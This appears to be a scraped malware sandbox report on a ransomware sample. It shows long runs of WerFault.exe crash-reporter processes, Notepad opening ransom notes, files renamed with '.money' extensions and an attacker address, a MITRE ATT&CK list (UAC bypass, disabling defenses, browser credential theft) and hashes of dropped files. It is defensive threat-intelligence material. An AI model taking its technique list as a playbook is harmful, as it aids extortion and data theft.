C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 9640 -ip 96401⤵PID:9420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 9640 -ip 96401⤵PID:7084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 12200 -ip 122001⤵PID:9660
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 9640 -ip 96401⤵PID:10888
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\412fa446ec2b490c953a3d806da72146 /t 7512 /p 65041⤵PID:5388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 8308 -ip 83081⤵PID:11644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 7576 -ip 75761⤵PID:7840
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 676 -p 9640 -ip 96401⤵PID:7800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8308 -ip 83081⤵PID:8404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 9640 -ip 96401⤵PID:12168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 7428 -ip 74281⤵PID:8976
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 8308 -ip 83081⤵PID:9044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 9640 -ip 96401⤵PID:2504
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 8308 -ip 83081⤵PID:7440
-
C:\Windows\system32\werfault.exewerfault.exe /h /shared Global\268653175fa54912b689e1faf22ba7fc /t 9872 /p 57841⤵PID:7560
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 10964 -ip 109641⤵PID:7008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 8308 -ip 83081⤵PID:9432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 9640 -ip 96401⤵PID:9788
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5944 -ip 59441⤵PID:12168
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 8308 -ip 83081⤵PID:5260
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 9640 -ip 96401⤵PID:9784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 9400 -ip 94001⤵PID:7572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 8308 -ip 83081⤵PID:6236
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 9640 -ip 96401⤵PID:12104
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 7820 -ip 78201⤵PID:9172
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 9640 -ip 96401⤵PID:7544
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8308 -ip 83081⤵PID:392
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 9640 -ip 96401⤵PID:11624
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 5944 -ip 59441⤵PID:9420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 8308 -ip 83081⤵PID:6776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 9640 -ip 96401⤵PID:5784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1932 -ip 19321⤵PID:9956
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 8308 -ip 83081⤵PID:10488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9640 -ip 96401⤵PID:9708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5108 -ip 51081⤵PID:9116
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8308 -ip 83081⤵PID:8420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 9640 -ip 96401⤵PID:10488
-
C:\Windows\system32\wbem\unsecapp.exeC:\Windows\system32\wbem\unsecapp.exe -Embedding1⤵PID:10688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 10940 -ip 109401⤵PID:8420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9640 -ip 96401⤵PID:11228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8308 -ip 83081⤵PID:11092
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 8308 -ip 83081⤵PID:12640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 12648 -ip 126481⤵PID:12720
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 8308 -ip 83081⤵PID:12952
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 13092 -ip 130921⤵PID:13160
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 13176 -ip 131761⤵PID:13896
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\FILES ENCRYPTED.txt1⤵PID:14024
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 13160 -ip 131601⤵PID:12308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 13376 -ip 133761⤵PID:13432
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 13228 -ip 132281⤵PID:12704
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 14124 -ip 141241⤵PID:13420
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 13456 -ip 134561⤵PID:13784
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 14460 -ip 144601⤵PID:14572
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 14808 -ip 148081⤵PID:13600
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 9640 -ip 96401⤵PID:15228
-
C:\Windows\system32\OpenWith.exeC:\Windows\system32\OpenWith.exe -Embedding1⤵PID:14900
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 8308 -ip 83081⤵PID:14748
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 14860 -ip 148601⤵PID:3400
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Desktop\s5vkt93u-readme.txt1⤵PID:14400
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 9640 -ip 96401⤵PID:15004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 8308 -ip 83081⤵PID:3404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 9640 -ip 96401⤵PID:9536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 13208 -ip 132081⤵PID:15384
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8308 -ip 83081⤵PID:15492
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 9640 -ip 96401⤵PID:15848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 8308 -ip 83081⤵PID:16072
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 16172 -ip 161721⤵PID:15188
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 15984 -ip 159841⤵PID:15804
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 9536 -ip 95361⤵PID:16424
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 16952 -ip 169521⤵PID:17020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 16764 -ip 167641⤵PID:14524
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 188 -p 1868 -ip 18681⤵PID:9620
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 17724 -ip 177241⤵PID:17800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 9640 -ip 96401⤵PID:18396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 18404 -ip 184041⤵PID:18888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 18632 -ip 186321⤵PID:14108
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 8308 -ip 83081⤵PID:19864
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 20008 -ip 200081⤵PID:20088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 624 -p 916 -ip 9161⤵PID:19880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 19864 -ip 198641⤵PID:1368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 20980 -ip 209801⤵PID:21020
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 20684 -ip 206841⤵PID:20852
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 19752 -ip 197521⤵PID:12488
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 21704 -ip 217041⤵PID:21780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 22308 -ip 223081⤵PID:22380
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 21708 -ip 217081⤵PID:4912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 23284 -ip 232841⤵PID:22884
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 724 -p 9640 -ip 96401⤵PID:23368
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 21744 -ip 217441⤵PID:23136
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 8308 -ip 83081⤵PID:11912
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 5096 -ip 50961⤵PID:1612
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 23264 -ip 232641⤵PID:23308
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 24020 -ip 240201⤵PID:24084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 23968 -ip 239681⤵PID:24088
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 8308 -ip 83081⤵PID:27932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 12164 -ip 121641⤵PID:28008
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 28404 -ip 284041⤵PID:28496
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 8308 -ip 83081⤵PID:23040
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\s3zn2mg98-readme.txt1⤵PID:25084
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 24996 -ip 249961⤵PID:24816
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 26340 -ip 263401⤵PID:27708
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 660 -p 26156 -ip 261561⤵PID:27180
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 27904 -ip 279041⤵PID:25404
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 26476 -ip 264761⤵PID:25648
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Public\Desktop\XQIZO-DECRYPT.txt1⤵PID:27200
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 26664 -ip 266641⤵PID:8140
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 616 -p 26092 -ip 260921⤵PID:25584
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 9640 -ip 96401⤵PID:8528
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 9640 -ip 96401⤵PID:26044
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 23476 -ip 234761⤵PID:4516
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 9640 -ip 96401⤵PID:27176
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 25020 -ip 250201⤵PID:25676
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 29328 -ip 293281⤵PID:29396
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 29012 -ip 290121⤵PID:29192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 28836 -ip 288361⤵PID:28800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 784 -p 30104 -ip 301041⤵PID:30196
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 29856 -ip 298561⤵PID:30052
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 30284 -ip 302841⤵PID:30640
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 780 -p 31156 -ip 311561⤵PID:31228
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 30008 -ip 300081⤵PID:30880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 30724 -ip 307241⤵PID:31468
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 32068 -ip 320681⤵PID:32144
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 32624 -ip 326241⤵PID:32700
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 32236 -ip 322361⤵PID:32696
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 684 -p 32692 -ip 326921⤵PID:32776
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 672 -p 33240 -ip 332401⤵PID:33300
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 33740 -ip 337401⤵PID:32780
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 32524 -ip 325241⤵PID:32868
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 33800 -ip 338001⤵PID:33848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 34276 -ip 342761⤵PID:34328
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 32524 -ip 325241⤵PID:33988
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 34012 -ip 340121⤵PID:34192
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 34936 -ip 349361⤵PID:34992
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 604 -p 35548 -ip 355481⤵PID:35592
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 35176 -ip 351761⤵PID:35320
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 35052 -ip 350521⤵PID:35536
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 580 -p 36044 -ip 360441⤵PID:36096
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 36516 -ip 365161⤵PID:36596
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 36452 -ip 364521⤵PID:36576
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 36836 -ip 368361⤵PID:36688
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 37248 -ip 372481⤵PID:37340
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 37716 -ip 377161⤵PID:37824
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 37396 -ip 373961⤵PID:37316
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 36964 -ip 369641⤵PID:37848
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 38056 -ip 380561⤵PID:38132
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 38564 -ip 385641⤵PID:38604
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 38136 -ip 381361⤵PID:38388
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 38612 -ip 386121⤵PID:37932
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 39080 -ip 390801⤵PID:39120
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 39576 -ip 395761⤵PID:39644
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 39280 -ip 392801⤵PID:39416
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 39392 -ip 393921⤵PID:39128
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 772 -p 39956 -ip 399561⤵PID:40004
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 40392 -ip 403921⤵PID:40444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 40804 -ip 408041⤵PID:40860
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 40360 -ip 403601⤵PID:40444
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 696 -p 40588 -ip 405881⤵PID:40296
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 716 -p 40740 -ip 407401⤵PID:41032
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 41468 -ip 414681⤵PID:41508
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 788 -p 41880 -ip 418801⤵PID:41960
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 41720 -ip 417201⤵PID:41888
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 41748 -ip 417481⤵PID:40472
Network
MITRE ATT&CK Enterprise v15
Execution
System Services
1Service Execution
1Windows Management Instrumentation
1Persistence
Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Privilege Escalation
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Boot or Logon Autostart Execution
2Registry Run Keys / Startup Folder
2Create or Modify System Process
2Windows Service
2Defense Evasion
Abuse Elevation Control Mechanism
1Bypass User Account Control
1Direct Volume Access
1File and Directory Permissions Modification
1Impair Defenses
2Disable or Modify Tools
2Indicator Removal
2File Deletion
2Modify Registry
5Credential Access
Credentials from Password Stores
2Credentials from Web Browsers
1Windows Credential Manager
1Unsecured Credentials
1Credentials In Files
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
8KB
MD55b0a0489c02c897237b3ec49443d60e1
SHA13a5b4287518806febb477ebe73dfa93dc8913a55
SHA256cd09fc0a88508bbfebff5e2e030289aed5318925296f523a5fcfdc9d4dc31fbe
SHA512af0c4d27d93c964c25a51adc324a0c3e0be53c7edf1ce35da1168a1281f077eaa5d1c9d41139c79cc58f7162eac87b1498588a3ebf1d6c884d3c71af947f9ff0
-
Filesize
1KB
MD50d5bc803a11b3e138fa9890197746ead
SHA142f81eff6792de5e4fb2f9169aab32b6b8c909d2
SHA25653d6794cd87ebeaabb82afcfaa6e8ce6f208b021452d67b75c07196e3da16037
SHA5128d70997a7bfa194a7a38a1a37e7387a6526ca2bd99279ea3fc4616506b92dcd278266820715f1b089614fd0f16722a9b3e16e8f431bd7d99f3bc0056b5b08fab
-
C:\Program Files\Common Files\microsoft shared\ClickToRun\AppvIsvSubsystems32.dll.id-38D4324C.[[email protected]].money
Filesize2.7MB
MD5ec38c51946fc3d1f6c634010413175f6
SHA1a605891df76dd31d5e3051f8dddc91969eb8d0e9
SHA2561ec6a68f96e67397b0e405d31284e98203380fbbbc7ad6b2466e84807d57440c
SHA512c60d24670eec6e49fd18819c6dbace30a1068ca981d77aadf878add5dba15daead8f71812a26ce036a49aed9dcd3449e4f27fd6a2cb5edbf885099d3160b4850
-
C:\Program Files\dotnet\shared\Microsoft.NETCore.App\6.0.27\[[email protected]]Microsoft.DiaSymReader.Native.amd64.dll.id-38D4324C.[[email protected]].money.sicck
Filesize2.5MB
MD5f28fb3e8d97cb0edd8662fabc875622b
SHA1e775fd2158c2516066c2f95db99f1630851cf1bb
SHA25634f5de831ce90064d51b2a854dd9b3aa54a012af35d670937333fe0062522169
SHA51225bceeb3fbe102de21d95b44ec5163ecb4845be0062170a8d61dd1ef21ee5e8efe9b96ad327009496953fb1692a61142f27c91973d2355b2fc85d703f8a8b757
-
Filesize
1.3MB
MD545184aaea2f47f6a569043f834690581
SHA109320ff533c6612e548ac7452d71c39f3ad13f16
SHA2568fd09186e5d2e2bce989f94b9a1ee4654382d396ca2e2680edacdcf8e21a4385
SHA51240dd31db4d73c248116ae7abc92195de2f0b5e7eed78f3bb418ba7dcf197f13a364f26f05fdaaa42cf89ea28cca606b1d33cf11a5d4f01c4dea931ebfcb4cbd2
-
Filesize
157KB
MD5dfec0c6ce91e2c48821d4933a8bfccf3
SHA181ec4b997d03c4ff6c6d955986d861bb7a714fd5
SHA25696791303cf22ec690ed24857ca0e5e6428180f60db1c8ab8187396be6f46bc54
SHA5126d3b53b714914e6277df73f7d41fede60e4c0c7a57becd31aa4d12ef46feafccb53e283169d2216fb107f05011c0cf2e07978c930de198d25fad1b55822117f3
-
Filesize
6KB
MD5e2937d948d0f72596e540a99da8cfb8a
SHA1e812f9b2238a78f60ab4515a18e8e02dca68db85
SHA25657e56d376797da4f0d98372b7ebe08e060f8adeb207fe82af54887f5d6a77cc7
SHA5122e4533f5fae629f89a2b82be3f59071c39ca1c39cbe9d1b5ded905b2db2cfc5460ac2a08014e3fa6ab10d1419ce39309ebfc391d5defdd6542678bdc151bb24f
-
Filesize
6KB
MD54bc417615f2531fb740e36eb6498c37b
SHA1854033635b450f1a4a4338629dac5b6a269fb7ca
SHA256c49ea31edc318363541e8d707618734f7fee0d77c84038edea3f576327e620a0
SHA51255e89e1c6da7a69cb8753ce45ea45dff8a49e8cd041bb41c9bc9724c98d0f7e32eca259bbe294df07c8920cd8ce48555ecae8a52d570d88a6b6f05f72dce3381
-
Filesize
64KB
MD5d2fb266b97caff2086bf0fa74eddb6b2
SHA12f0061ce9c51b5b4fbab76b37fc6a540be7f805d
SHA256b09f68b61d9ff5a7c7c8b10eee9447d4813ee0e866346e629e788cd4adecb66a
SHA512c3ba95a538c1d266beb83334af755c34ce642a4178ab0f2e5f7822fd6821d3b68862a8b58f167a9294e6d913b08c1054a69b5d7aec2efdb3cf9796ed84de21a8
-
Filesize
4B
MD5f49655f856acb8884cc0ace29216f511
SHA1cb0f1f87ec0455ec349aaa950c600475ac7b7b6b
SHA2567852fce59c67ddf1d6b8b997eaa1adfac004a9f3a91c37295de9223674011fba
SHA512599e93d25b174524495ed29653052b3590133096404873318f05fd68f4c9a5c9a3b30574551141fbb73d7329d6be342699a17f3ae84554bab784776dfda2d5f8
-
Filesize
944B
MD56bd369f7c74a28194c991ed1404da30f
SHA10f8e3f8ab822c9374409fe399b6bfe5d68cbd643
SHA256878947d0ec814fe7c343cdebc05eebf00eb14f3023bdb3809a559e17f399fe5d
SHA5128fc5f073dc9fa1e1ae47c60a5f06e0a48709fd6a4302dffaa721858409e7bde64bc6856d3fb28891090516d1a7afc542579de287778b5755eafe75cc67d45d93
-
Filesize
462KB
MD53944e996c7850c70106fe075175aee3a
SHA1259a09060f4e61ee1c5ad85984b2289b11d2fa5f
SHA25650e0342442610e262f0ae8b18c76210bdf7b57b7112a08ab12fdd9564d437c48
SHA512f60fb57955205b08bd57c7f43011b1697377282d490a5eec4964e5ba6d5bfee6893bf0e086f4d90d5d059c6e3218fc85e88b9d191de57e35c262b6e09a392af8
-
Filesize
177B
MD5d5c58a0e38ad47fecaa2f04eb36eb0f7
SHA16743b5d86b01dd0cdff0345b782caf553b15f1b2
SHA25659e1f53131a76a7ee45f30873d013f4d3bc793d207e83a5c5de12916aee89d4d
SHA512dd352d2c77a585231f90cfed8e5d1dd7344ab179183a46a8d24bf7a43450da2b5bdb5888778cd967a3ff09e6dbdb9bdefb19820435c1232bd94489f4772ba113
-
